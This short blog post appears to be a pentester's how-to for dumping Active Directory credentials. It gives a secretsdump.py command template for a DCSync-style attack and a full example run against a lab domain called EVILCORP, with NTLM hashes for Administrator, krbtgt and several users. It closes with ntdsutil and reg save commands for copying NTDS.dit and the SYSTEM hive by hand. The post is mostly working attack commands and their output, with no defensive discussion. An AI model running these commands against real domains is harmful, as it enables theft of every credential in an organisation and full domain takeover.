https://sql--injection.blogspot.co.uk: DCSync

DCSYNC - Automatic

python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -just-dc DOMAIN/USER:'PASSWORD'@IP -use-vss

$ python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -just-dc EVILCORP/Administrator:'PASSWORD'@192.168.1.20 -use-vss

Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Target system bootKey: 0xe3c5303ac924ca2e4fc060bacf25efd3
[*] Searching for NTDS.dit
[*] Registry says NTDS.dit is at C:\Windows\NTDS\ntds.dit. Calling vssadmin to get a copy. This might take some time
[*] Using smbexec method for remote execution
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: ee1b7c0b536ce4f2b768a48470ce8c0f
[*] Reading and decrypting hashes from \\192.168.1.20\ADMIN$\Temp\WobZflyu.tmp

EVILCORP.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:a25ad8068476008880554449670a2bfb::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DC-1$:1000:aad3b435b51404eeaad3b435b51404ee:1dfb6297664a903fa25c459a31236bb2::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:fa5fa8bd972719b46e335c07a2a87111::: EVILCORP.local\mh_:1103:aad3b435b51404eeaad3b435b51404ee:e69c577da100da9d10a6b279b75764df::: EVILCORP.local\kb_:1104:aad3b435b51404eeaad3b435b51404ee:e69c577da100da9d10a6b279b75764df::: EVILCORP.local\geri.cooper:1105:aad3b435b51404eeaad3b435b51404ee:7fba703d0a92d2c84a610e6f74185972::: EVILCORP.local\jamie.white:1106:aad3b435b51404eeaad3b435b51404ee:7fba703d0a92d2c84a610e6f74185972::: EVILCORP.local\steve_jobs:1107:aad3b435b51404eeaad3b435b51404ee:7fba703d0a92d2c84a610e6f74185972::: EVILCORP.local\sarah.french:1108:aad3b435b51404eeaad3b435b51404ee:7fba703d0a92d2c84a610e6f74185972::: EVILCORP.local\sergiu.cosmescu:1109:aad3b435b51404eeaad3b435b51404ee:7fba703d0a92d2c84a610e6f74185972:::

Manual Method - If we need to extract the NTDS.dit and SYSTEM Hive from a Windows machine.

NTDS.dit
ntdsutil "ac i ntds" "ifm" "create full c:\temp\ntdsdump" q q

SYSTEM Hive -
reg SAVE HKLM\SYSTEM C:\extract\SYS

DCSync

No comments:

Post a Comment